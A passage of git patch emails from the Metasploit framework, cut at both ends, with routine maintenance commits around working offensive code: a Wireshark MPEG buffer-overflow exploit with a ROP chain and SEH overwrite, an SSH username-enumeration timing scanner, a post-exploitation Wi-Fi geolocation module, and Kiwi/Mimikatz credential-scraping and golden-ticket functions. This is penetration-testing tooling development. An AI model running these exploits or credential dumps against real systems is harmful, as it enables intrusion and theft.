[libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] - 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] - 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop - 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets @@ -98,14 +99,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + packet = pattern_create(892) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) - packet << "\x90\x90\x90\x90" # nseh - # 0xff is badchar then we can't make a jump back with jmp $-2000 + packet << make_nops(4) # nseh + # \0xff is a badchar then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN From cc2d4f9ed7f44b6595c4c1d6da73a3755b7dc4f2 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:03:22 +0200 Subject: [PATCH 119/853] Remove unnecesary @good_credentials --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index f8f36d63de..7c2750235b 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - attr_accessor :ssh_socket, :good_credentials + attr_accessor :ssh_socket THRESHOLD = 10 @@ -55,7 +55,6 @@ class Metasploit3 < Msf::Auxiliary ) deregister_options('RHOST') - @good_credentials = {} end From 47ff820a830e86dcfb110a11738e1412941dfe70 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:06:46 +0200 Subject: [PATCH 120/853] Remove unnecesary 'RHOST' deregister --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 7c2750235b..f2519b55d9 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -53,8 +53,6 @@ class Metasploit3 < Msf::Auxiliary ' for each user', 3]) ] ) - - deregister_options('RHOST') end From 8a3329c8917c54ba8034e7507746c1dfef16cbad Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:10:34 +0200 Subject: [PATCH 121/853] Password made pseudo-random instead of a bunnch of A's --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index f2519b55d9..d3b17b1366 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary def check_user(ip, user, port) - pass = 'A' * 64_000 + pass = Rex::Text.rand_text_alphanumeric(64_000) opt_hash = { :auth_methods => ['password', 'keyboard-interactive'], From c875bdadf5c9d99fbe524b640e22116a7bc33955 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:18:48 +0200 Subject: [PATCH 122/853] Change THRESHOLD into a datastore option --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index d3b17b1366..c9c9ed994f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -14,8 +14,6 @@ class Metasploit3 < Msf::Auxiliary attr_accessor :ssh_socket - THRESHOLD = 10 - def initialize super( 'Name' => 'SSH Username Enumeration', @@ -34,6 +32,10 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('USER_FILE', [true, 'File containing usernames, one per line', nil]), + OptInt.new('THRESHOLD', + [true, + 'Amount of seconds needed before a user is considered ' \ + 'found', 10]), Opt::RPORT(22) ], self.class ) @@ -64,6 +66,9 @@ class Metasploit3 < Msf::Auxiliary datastore['RETRY_NUM'] end + def threshold + datastore['THRESHOLD'] + end def check_user(ip, user, port) pass = Rex::Text.rand_text_alphanumeric(64_000) @@ -102,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary finish_time = Time.new - if finish_time - start_time > THRESHOLD + if finish_time - start_time > threshold return :success else return :fail From fb0af8a799802fc3de233e9347479af055dac2de Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:46:51 +0200 Subject: [PATCH 123/853] Remove unnecesary ssh_socket variable --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index c9c9ed994f..fe216cb3df 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,8 +12,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - attr_accessor :ssh_socket - def initialize super( 'Name' => 'SSH Username Enumeration', @@ -90,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - ssh_socket = Net::SSH.start(ip, user, opt_hash) + Net::SSH.start(ip, user, opt_hash) end rescue Rex::ConnectionError, Rex::AddressInUse From b8e0187647ce3016e3c913674a4db2c032c98787 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:56:17 +0200 Subject: [PATCH 124/853] Use OptPath for file path options --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index fe216cb3df..306b98b707 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('USER_FILE', + OptPath.new('USER_FILE', [true, 'File containing usernames, one per line', nil]), OptInt.new('THRESHOLD', [true, From 97ef53a1d172fc11381aaa8da98f388add042171 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Fri, 18 Apr 2014 16:45:07 -0500 Subject: [PATCH 125/853] Add upper bound for active-* gems We do not yet support ActiveRecord and ActiveSupport 4.x, so ensure our Gemfile declares this. --- Gemfile | 4 ++-- Gemfile.lock | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile b/Gemfile index c6f821cd4c..9045947d35 100755 --- a/Gemfile +++ b/Gemfile @@ -1,7 +1,7 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern -gem 'activesupport', '>= 3.0.0' +gem 'activesupport', '>= 3.0.0', '< 4.0.0' # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) gem 'bcrypt' # Needed for some admin modules (scrutinizer_add_user.rb) @@ -19,7 +19,7 @@ gem 'packetfu', '1.1.9' group :db do # Needed for Msf::DbManager - gem 'activerecord' + gem 'activerecord', '>= 3.0.0', '< 4.0.0' # Database models shared between framework and Pro. gem 'metasploit_data_models', '~> 0.17.0' # Needed for module caching in Mdm::ModuleDetails diff --git a/Gemfile.lock b/Gemfile.lock index 379ea1cb81..8c708c0467 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -61,8 +61,8 @@ PLATFORMS ruby DEPENDENCIES - activerecord - activesupport (>= 3.0.0) + activerecord (>= 3.0.0, < 4.0.0) + activesupport (>= 3.0.0, < 4.0.0) bcrypt database_cleaner factory_girl (>= 4.1.0) From 7bc546e69a8e86b81ea91a450f6a72ff8ee3506b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 17:45:28 +0100 Subject: [PATCH 126/853] Add rand_text_alpha function --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 89b19f7b5a..3034a0c0f1 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { - 'BadChars' => "\xff\x00", + 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 @@ -63,10 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def junk - return rand_text(4).unpack("L")[0].to_i - end - def create_rop_chain() # rop chain generated with mona.py - www.corelan.be @@ -98,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + packet = rand_text_alpha(891) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode From 3861541204e6bd23bb92b5e5d64179ca3e36355a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 18:37:58 +0100 Subject: [PATCH 127/853] Add more rand_text_alpha functions --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3034a0c0f1..3002bfe3e7 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode - packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) packet << make_nops(4) # nseh # \0xff is a badchar then we can't make a jump back with jmp $-2000 From 2fd004b69e0c731139f8ae3198c3ab4f9b932e53 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sat, 19 Apr 2014 17:31:48 -0500 Subject: [PATCH 128/853] New module: Multiplatform Wireless LAN Geolocation This is a new POST module that allows Windows, Linux, and OSX targets to be geolocated using Google services if the target has an active and functional wireless adapter. --- modules/post/multi/gather/wlan_geolocate.rb | 167 ++++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 modules/post/multi/gather/wlan_geolocate.rb diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb new file mode 100644 index 0000000000..b959960fbe --- /dev/null +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'json' +require 'net/http' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Multiplatform Wireless LAN Geolocation', + 'Description' => %q{ Geolocate the target device by gathering local + wireless networks and performing a lookup against Google APIs.}, + 'License' => MSF_LICENSE, + 'Author' => [ 'Tom Sellers fadedcode.net>'], + 'Platform' => %w{ osx win linux }, + 'SessionTypes' => [ 'meterpreter', 'shell' ], + )) + + end + + def get_strength(quality) + # Convert the signal quality to signal strength (dbm) to be sent to + # Google. Docs indicate this should subtract 100 instead of the 95 I + # am using here, but in practice 95 seems to be closer. + signal_str = quality.to_i / 2 + signal_str = (signal_str - 95).round + return signal_str + + end + + def parse_wireless_win(listing) + wlan_list = '' + raw_networks = listing.split("\r\n\r\n") + + raw_networks.each { |network| + details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m) + if !details.nil? + strength = get_strength(details[3]) + network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}" + wlan_list << network_data + end + } + + return wlan_list + end + + + def parse_wireless_linux(listing) + wlan_list = '' + raw_networks = listing.split("Cell ") + + raw_networks.each { |network| + details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m) + if !details.nil? + network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}" + wlan_list << network_data + end + } + + return wlan_list + end + + def parse_wireless_osx(listing) + wlan_list = '' + raw_networks = listing.split("\n") + + raw_networks.each { |network| + network = network.strip + details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/) + if !details.nil? + network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}" + wlan_list << network_data + end + } + + return wlan_list + end + + + # Run Method for when run command is issued + def run + if session.type =~ /shell/ + # Use the shell platform for selecting the command + platform = session.platform + else + # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform + platform = session.sys.config.sysinfo['OS'] + end + + + case platform + when /win/i + + listing = cmd_exec('netsh wlan show networks mode=bssid') + if listing.nil? + print_error("Unable to generate wireless listing..") + return nil + else + store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + wlan_list = parse_wireless_win(listing) + end + + when /osx/i + + listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s') + if listing.nil? + print_error("Unable to generate wireless listing..") + return nil + else + store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + wlan_list = parse_wireless_osx(listing) + end + + when /linux/i + + listing = cmd_exec('iwlist scanning') + if listing.nil? + print_error("Unable to generate wireless listing..") + return nil + else + store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + wlan_list = parse_wireless_linux(listing) + end + else + print_error("The target's platform is not supported at this time.") + return nil + end + + if wlan_list.nil? || wlan_list.empty? + print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.") + return + end + + + # Build and send the request to Google + url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}" + uri = URI.parse(URI.encode(url)) + request = Net::HTTP::Get.new(uri.request_uri) + http = Net::HTTP::new(uri.host,uri.port) + http.use_ssl = true + response = http.request(request) + + # Gather the required information from the response + if response && response.code == '200' + results = JSON.parse(response.body) + latitude = results["location"]["lat"] + longitude = results["location"]["lng"] + accuracy = results["accuracy"] + print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.") + print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}") + else + print_error("Failure connecting to Google for location lookup") + end + + + rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError + rescue ::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end + + +end From 16349099759241506baa7ba72905c22d1ee99e19 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 20 Apr 2014 00:44:48 +0200 Subject: [PATCH 129/853] Bumped ruby version to newest 1.9.3 Otherwise this message is always displayed when entering the folder ruby-1.9.3-p484 is not installed. To install do: 'rvm install ruby-1.9.3-p484' And running up to date software is never a failure (even when 1.9.3 is no longer maintained) --- .ruby-version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.ruby-version b/.ruby-version index 7a895c2142..671d1fe46c 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p484 +1.9.3-p545 From fc803ae277cd3d4b95720d5abd8cc437af6de579 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 20 Apr 2014 22:41:32 +0200 Subject: [PATCH 130/853] Changed msftidy check send_request_raw does not support vars_get so change the message to switch to send_request_cgi. See #3272 for more info --- tools/msftidy.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 07fb8e4463..b263d16f61 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -485,10 +485,18 @@ class Msftidy end def check_vars_get - test = @source.scan(/send_request_(?:cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im) + test = @source.scan(/(send_request_(cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+)/im) unless test.empty? test.each { |item| - warn("Please use vars_get in send_request_cgi and send_request_raw: #{item}") + case item[1] + when 'cgi' + warn("Please use vars_get in send_request_cgi: #{item[0]}") + when 'raw' + # send_request_raw does not support vars_getiirb + warn("Please use vars_get and switch to send_request_cgi: #{item[0]}") + else + raise('Error in regex') + end } end end From 49bd86f07743169c9bd628850df870d5056dc8b9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 21 Apr 2014 03:12:23 -0500 Subject: [PATCH 131/853] Clean up yardocs and a few style issues --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 73 ++++++++----------- .../ui/console/command_dispatcher/kiwi.rb | 24 +++--- lib/rex/text.rb | 11 ++- 3 files changed, 52 insertions(+), 56 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 6f9b6d4282..3a7eeb7d86 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -39,7 +39,7 @@ class Kiwi < Extension # dumped kerberos tickets. The order of these is important. Each # of them was pulled from the Mimikatz 2.0 source base. # - @@kerberos_flags = [ + KERBEROS_FLAGS = [ "NAME CANONICALIZE", "", "OK AS DELEGATE", @@ -56,11 +56,12 @@ class Kiwi < Extension "FORWARDED", "FORWARDABLE", "RESERVED" - ] + ].map(&:freeze).freeze # # Typical extension initialization routine. # + # @param client (see Extension#initialize) def initialize(client) super(client, 'kiwi') @@ -76,8 +77,7 @@ class Kiwi < Extension # # Dump the LSA secrets from the target machine. # - # Returns [Hash] - # + # @return [Hash] def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -129,17 +129,15 @@ class Kiwi < Extension # Convert a flag set to a list of string representations for the bit flags # that are set. # - # @param flags [Integer] - Integer bitmask of Kerberos token flags. - # - # Returns [String] + # @param flags [Fixnum] Integer bitmask of Kerberos token flags. # + # @return [Array] Names of all set flags in +flags+. See + # {KERBEROS_FLAGS} def to_kerberos_flag_list(flags) flags = flags >> 16 results = [] - @@kerberos_flags.each_with_index do |item, idx| - mask = 1 << idx - + KERBEROS_FLAGS.each_with_index do |item, idx| if (flags & (1 << idx)) != 0 results << item end @@ -151,9 +149,9 @@ class Kiwi < Extension # # List available kerberos tickets. # - # @param export [Bool] - Set to +true+ to export the content of each ticket + # @param export [Bool] Set to +true+ to export the content of each ticket # - # Returns [Array[Hash]] + # @return [Array] # def kerberos_ticket_list(export) export ||= false @@ -184,9 +182,9 @@ class Kiwi < Extension # # Use the given ticket in the current session. # - # @param icket [Array[Byte]] - Content of the Kerberos ticket to use. + # @param ticket [String] Content of the Kerberos ticket to use. # - # Returns [Bool] + # @return [void] # def kerberos_ticket_use(ticket) request = Packet.create_request('kiwi_kerberos_ticket_use') @@ -198,7 +196,7 @@ class Kiwi < Extension # # Purge any Kerberos tickets that have been added to the current session. # - # Returns [Bool] + # @return [void] # def kerberos_ticket_purge request = Packet.create_request('kiwi_kerberos_ticket_purge') @@ -209,14 +207,14 @@ class Kiwi < Extension # # Create a new golden kerberos ticket on the target machine and return it. # - # @param user [String] - Name of the user to create the ticket for. - # @param domain [String] - Domain name. - # @param sid [String] - SID of the domain. - # @param tgt [String] - The kerberos ticket granting token. - # @param id [Integer] - ID of the user to grant the token for. - # @param group_ids [Array[Integer]] - IDs of the groups to assign to the user + # @param user [String] Name of the user to create the ticket for. + # @param domain [String] Domain name. + # @param sid [String] SID of the domain. + # @param tgt [String] The kerberos ticket granting token. + # @param id [Fixnum] ID of the user to grant the token for. + # @param group_ids [Array] IDs of the groups to assign to the user # - # Returns [Array[Byte]] + # @return [String] # def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = []) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') @@ -231,15 +229,14 @@ class Kiwi < Extension end response = client.send_request(request) -return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end # # List all the wifi interfaces and the profiles associated # with them. Also show the raw text passwords for each. # - # Returns [Array[Hash]] - # + # @return [Array] def wifi_list request = Packet.create_request('kiwi_wifi_profile_list') @@ -278,10 +275,9 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape passwords from the target machine. # - # @param pwd_id - ID of the type credential to scrape. - # - # Returns [Array[Hash]] + # @param pwd_id [Fixnum] ID of the type credential to scrape. # + # @return [Array] def scrape_passwords(pwd_id) request = Packet.create_request('kiwi_scrape_passwords') request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) @@ -306,8 +302,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape all passwords from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def all_pass scrape_passwords(PWD_ID_SEK_ALLPASS) end @@ -315,8 +310,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape wdigest credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def wdigest scrape_passwords(PWD_ID_SEK_WDIGEST) end @@ -324,8 +318,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape msv credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def msv scrape_passwords(PWD_ID_SEK_MSV) end @@ -333,8 +326,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape LiveSSP credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def livessp scrape_passwords(PWD_ID_SEK_LIVESSP) end @@ -342,8 +334,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape SSP credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def ssp scrape_passwords(PWD_ID_SEK_SSP) end @@ -351,8 +342,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape TSPKG credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def tspkg scrape_passwords(PWD_ID_SEK_TSPKG) end @@ -360,8 +350,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape Kerberos credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def kerberos scrape_passwords(PWD_ID_SEK_KERBEROS) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 3502931aa2..be6500b771 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -433,10 +433,10 @@ class Console::CommandDispatcher::Kiwi protected def check_privs - unless system_check - print_warning("Not running as SYSTEM, execution may fail") - else + if system_check print_good("Running as SYSTEM") + else + print_warning("Not running as SYSTEM, execution may fail") end end @@ -452,11 +452,13 @@ protected # # Invoke the password scraping routine on the target. # - # +provider+ [String] - The name of the type of credentials to dump (used for - # display purposes only). - # +method+ [Block] - Block that contains a call to the method that invokes the - # appropriate function on the client that returns the results from Meterpreter. + # @param provider [String] The name of the type of credentials to dump + # (used for display purposes only). + # @param method [Proc] Block that calls the method that invokes the + # appropriate function on the client that returns the results from + # Meterpreter that lay in the house that Jack built. # + # @return [void] def scrape_passwords(provider, method) check_privs print_status("Retrieving #{provider} credentials") @@ -488,12 +490,14 @@ protected end # - # Helper function to convert a potentially blank value to hex and have the - # outer spaces stripped + # Helper function to convert a potentially blank value to hex and have + # the outer spaces stripped # + # @param (see Rex::Text.to_hex) + # @return [String] The result of {Rex::Text.to_hex}, strip'd def to_hex(value, sep = '') value ||= "" - Rex::Text::to_hex(value, sep).strip + Rex::Text.to_hex(value, sep).strip end end diff --git a/lib/rex/text.rb b/lib/rex/text.rb index c9e90f248c..56e0ceb791 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1291,13 +1291,16 @@ module Text end # - # Convert an array of 16 bytes to a GUID string + # Convert 16-byte string to a GUID string # - # @param bytes [Array[Byte]] Array of 16 bytes which represent a GUID - # in the proper order. + # @example + # str = "ABCDEFGHIJKLMNOP" + # Rex::Text.to_guid(str) #=> "{44434241-4645-4847-494a-4b4c4d4e4f50}" # - # Returns [String]. + # @param bytes [String] 16 bytes which represent a GUID in the proper + # order. # + # @return [String] def self.to_guid(bytes) return nil unless bytes s = bytes.unpack('H*')[0] From 0b7a2b9ceff9f737708018cd8699639c1f951692 Mon Sep 17 00:00:00 2001 From: Trenton Ivey Date: Mon, 21 Apr 2014 11:03:52 -0500 Subject: [PATCH 132/853] Added plugin to provide formatted wiki output from the framework database --- plugins/wiki.rb | 575 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 575 insertions(+) create mode 100644 plugins/wiki.rb diff --git a/plugins/wiki.rb b/plugins/wiki.rb new file mode 100644 index 0000000000..9e8d31f5af --- /dev/null +++ b/plugins/wiki.rb @@ -0,0 +1,575 @@ +## +# +# This plugin requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +# +## + +module Msf + +### +# +# This plugin extends the Rex::Ui::Text::Table class and provides commands +# that output database information for the current workspace in a wiki +# friendly format +# +# @author Trenton Ivey +# * *email:* ("trenton.ivey@example.com").gsub(/example/,"gmail") +# * *github:* kn0 +# * *twitter:* trentonivey +### +class Plugin::Wiki < Msf::Plugin + + ### + # + # This class implements a command dispatcher that provides commands to + # output database information in a wiki friendly format. + # + ### + class WikiCommandDispatcher + include Msf::Ui::Console::CommandDispatcher + + # + # The dispatcher's name. + # + def name + "Wiki" + end + + # + # Returns the hash of commands supported by the wiki dispatcher. + # + def commands + { + "dokuwiki" => "Outputs data from the current workspace in dokuwiki markup.", + "mediawiki" => "Outputs data from the current workspace in mediawiki markup." + } + end + + # + # Outputs database entries as Dokuwiki formatted text by passing the + # arguments to the wiki method with a wiki_type of 'dokuwiki' + # @param [Array] args the arguments passed when the command is + # called + # @see #wiki + # + def cmd_dokuwiki(*args) + wiki("dokuwiki", *args) + end + + # + # Outputs database entries as Mediawiki formatted text by passing the + # arguments to the wiki method with a wiki_type of 'mediawiki' + # @param [Array] args the arguments passed when the command is + # called + # @see #wiki + # + def cmd_mediawiki(*args) + wiki("mediawiki", *args) + end + + # + # This method parses arguments passed from the wiki output commands + # and then formats and displays or saves text according to the + # provided wiki type + # + # @param [String] wiki_type selects the wiki markup lanuguage output to + # use, it can be: + # * dokuwiki + # * mediawiki + # + # @param [Array] args the arguments passed when the command is + # called + # + def wiki(wiki_type, *args) + # Create a table options hash + tbl_opts = {} + # Set some default options for the table hash + tbl_opts[:hosts] = [] + tbl_opts[:links] = false + tbl_opts[:wiki_type] = wiki_type + tbl_opts[:heading_size] = 5 + case wiki_type + when "dokuwiki" + tbl_opts[:namespace] = 'notes:targets:hosts:' + else + tbl_opts[:namespace] = '' + end + + # Get the table we should be looking at + command = args.shift + if command.nil? or not ["creds","hosts","loot","services","vulns"].include? 